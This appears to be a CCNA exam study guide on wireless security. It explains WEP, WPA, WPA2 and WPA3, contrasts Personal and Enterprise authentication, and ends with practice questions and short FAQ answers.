Wireless security is a required topic on CCNA 200-301. You need to understand the progression from WEP (broken) through WPA, WPA2, and WPA3, the difference between Personal (PSK) and Enterprise (802.1X) modes, and the encryption algorithms each generation uses. This guide covers the key security features, their weaknesses, and what the exam expects you to know about each standard.
Practice this topic
Wired Equivalent Privacy (WEP) was the original 802.11 wireless security standard from 1997. WEP uses RC4 stream cipher with 40-bit or 104-bit keys. The fatal flaw: WEP reuses the same keystream, and the Initialization Vector (IV) is only 24 bits, leading to IV reuse that allows passive cryptanalysis. WEP can be cracked in minutes with freely available tools.
WEP should never be used. It is included in CCNA only as historical context and to understand why later standards were developed. If you see WEP as an answer option and the question is about 'secure' or 'recommended' — eliminate it immediately.
Wi-Fi Protected Access (WPA) was released in 2003 as an emergency replacement for WEP while 802.11i (WPA2) was being finalized. WPA uses TKIP (Temporal Key Integrity Protocol), which wraps RC4 with per-packet key mixing and a message integrity code (MIC, called 'Michael') to prevent the IV reuse attack.
WPA was designed to run on existing WEP hardware via firmware update. While significantly more secure than WEP, TKIP itself has known weaknesses (TKIP MIC failure attacks). WPA/TKIP is deprecated and should be replaced with WPA2 or WPA3.
WPA introduced the Personal (PSK) and Enterprise (802.1X) modes that carry through to WPA2 and WPA3.
WPA2 (802.11i) replaced WPA as the security standard in 2004. WPA2 uses CCMP (Counter Mode CBC-MAC Protocol) based on AES (Advanced Encryption Standard), a fundamentally stronger cipher than RC4. WPA2 is the minimum acceptable security standard for any current wireless deployment.
WPA2-Personal (WPA2-PSK) uses a Pre-Shared Key — a passphrase known to all users. The passphrase is used to derive the Pairwise Master Key (PMK). All clients use the same passphrase. Simple to deploy; weakness is that if the passphrase is compromised, all clients are affected, and there's no per-user identity.
WPA2-Enterprise uses 802.1X/EAP for authentication. Each user has individual credentials authenticated by a RADIUS server. Per-user PMK is derived dynamically per session — compromise of one user's session key doesn't affect others. Enterprise mode provides the identity-based access control needed for corporate networks.
WPA2 vulnerability: KRACK (Key Reinstallation Attack, 2017) demonstrated that WPA2 handshake could be manipulated. Mitigated by vendor patches. Also, weak PSK passphrases are vulnerable to offline dictionary attacks — use long, random passphrases.
WPA3 was released in 2018 to address WPA2 weaknesses. WPA3-Personal replaces PSK with SAE (Simultaneous Authentication of Equals), a protocol based on the Dragonfly handshake. SAE provides forward secrecy — even if an attacker records traffic and later obtains the passphrase, they cannot decrypt previously recorded sessions. SAE also resists offline dictionary attacks.
WPA3-Enterprise mandates 192-bit cryptographic strength (CNSA suite) for high-security environments. It uses stronger AES-256 (GCMP-256) and SHA-384 as the minimum cipher suite.
WPA3 Enhanced Open (OWE, Opportunistic Wireless Encryption) encrypts open network traffic without requiring a password. This protects users on public Wi-Fi from passive eavesdropping even on networks with no password — previously, open networks transmitted all traffic in plaintext.
WPA3 transition mode allows WPA3 and WPA2 devices to coexist on the same SSID during migration. For CCNA: know the key improvements — SAE replaces PSK, forward secrecy, stronger mandatory ciphers.
Open authentication (no security): no credentials required. Any device can join. Appropriate only for captive portal environments where a different mechanism handles access control. Never acceptable for corporate networks.
WPA2/3-Personal (PSK/SAE): passphrase authentication. All devices use the same credential. Easy to manage for small environments; doesn't scale because you can't revoke access for one user without changing the passphrase for everyone.
WPA2/3-Enterprise (802.1X/EAP): individual user credentials. Integrates with corporate identity systems (Active Directory via RADIUS). Users can be individually authenticated, authorized, and revoked. Required for compliance-driven environments (PCI-DSS, HIPAA).
| Standard | Encryption | Auth method | Key exchange | Status |
|---|---|---|---|---|
| WEP | RC4 (40/104-bit) | Open/Shared Key | Static key | Broken — never use |
| WPA | TKIP (RC4) | PSK or 802.1X | TKIP per-packet | Deprecated |
| WPA2-Personal | CCMP (AES-128) | PSK | 4-way handshake | Current standard |
| WPA2-Enterprise | CCMP (AES-128) | 802.1X/EAP + RADIUS | Dynamic per-session | Current standard (enterprise) |
| WPA3-Personal | CCMP (AES-128) | SAE (Dragonfly) | Forward secrecy | Recommended |
| WPA3-Enterprise | GCMP-256 (AES-256) | 802.1X/EAP + RADIUS | 192-bit suite | Highest security |
WPA2 and WPA3 use the same encryption algorithm
WPA2-Personal/Enterprise uses CCMP (AES-128). WPA3-Enterprise uses GCMP-256 (AES-256) as the minimum. WPA3-Personal also uses CCMP but replaces PSK with SAE for key exchange.
Using a complex password with WPA2-Personal is as secure as WPA2-Enterprise
WPA2-Enterprise provides per-user authentication, per-session dynamic keys, and the ability to revoke individual access. WPA2-Personal shares one passphrase among all users — a compromised passphrase affects everyone, and there's no per-user identity or revocation without changing the password.
WEP is acceptable for legacy devices that don't support WPA2
WEP is cryptographically broken and can be cracked in minutes. If a device only supports WEP, it should be replaced or isolated on a separate network with no access to sensitive resources.
These questions are representative of what you will see on CCNA exams. The correct answer and explanation are shown immediately below each question.
Which wireless security protocol uses CCMP based on AES for encryption?
Explanation: WPA2 (802.11i) uses CCMP (Counter Mode CBC-MAC Protocol) based on AES-128 as its encryption algorithm. WEP and WPA use RC4-based encryption (WEP directly, WPA via TKIP).
A hospital needs wireless security where each doctor authenticates with their individual Active Directory credentials. Which solution is appropriate?
Explanation: WPA2-Enterprise uses 802.1X/EAP with a RADIUS server that can integrate with Active Directory. Each user authenticates with individual credentials, enabling per-user access control, accounting, and revocation.
Which WPA3 feature protects previously recorded wireless traffic even if the passphrase is compromised later?
Explanation: WPA3-Personal uses SAE (Simultaneous Authentication of Equals), which provides forward secrecy. Each session uses unique keys derived through the SAE handshake — obtaining the passphrase later cannot decrypt previously captured sessions.
Which statement correctly describes a weakness of WPA2-Personal compared to WPA2-Enterprise?
Explanation: WPA2-Personal uses AES encryption (same strength as Enterprise) but authenticates all users with the same pre-shared passphrase. There is no per-user identity; revoking one user requires changing the passphrase for everyone. Enterprise mode provides individual authentication and revocation.
WPA3 Enhanced Open (OWE) provides which security feature on open wireless networks?
Explanation: WPA3 Enhanced Open (Opportunistic Wireless Encryption) encrypts open network traffic without requiring a passphrase. This protects against passive eavesdropping on public Wi-Fi networks that previously transmitted all data in plaintext.
WPA2-Personal uses a pre-shared key (passphrase) — all users share the same credential. WPA2-Enterprise uses 802.1X/EAP with a RADIUS server — each user authenticates with individual credentials. Enterprise provides per-user identity, accounting, and the ability to revoke individual access without affecting other users.
WEP uses RC4 with only a 24-bit Initialization Vector (IV), which is reused frequently. The keystream reuse allows an attacker to recover the WEP key using passive traffic capture and cryptanalysis — tools can crack WEP in minutes without knowing the password. WEP has no protection against traffic injection or key recovery.
WPA3-Personal replaces PSK with SAE (Simultaneous Authentication of Equals), providing forward secrecy and resistance to offline dictionary attacks. WPA3-Enterprise mandates stronger 192-bit cryptography. WPA3 Enhanced Open encrypts previously plaintext open networks. SAE forward secrecy is the most significant improvement.
WPA uses TKIP (Temporal Key Integrity Protocol) based on RC4 — it was designed to run on WEP hardware via firmware update. WPA2 uses CCMP (Counter Mode CBC-MAC Protocol) based on AES-128, a fundamentally stronger cipher. TKIP is deprecated; WPA2/CCMP is the minimum acceptable standard.
Yes, through WPA3 Transition Mode. The AP advertises both WPA2 and WPA3 on the same SSID. WPA3-capable devices use WPA3 (SAE); WPA2-only devices use WPA2 (PSK). This allows gradual migration without requiring immediate replacement of all client devices.
Try free Wireless Security (WPA) practice questions with explanations, topic links and progress tracking.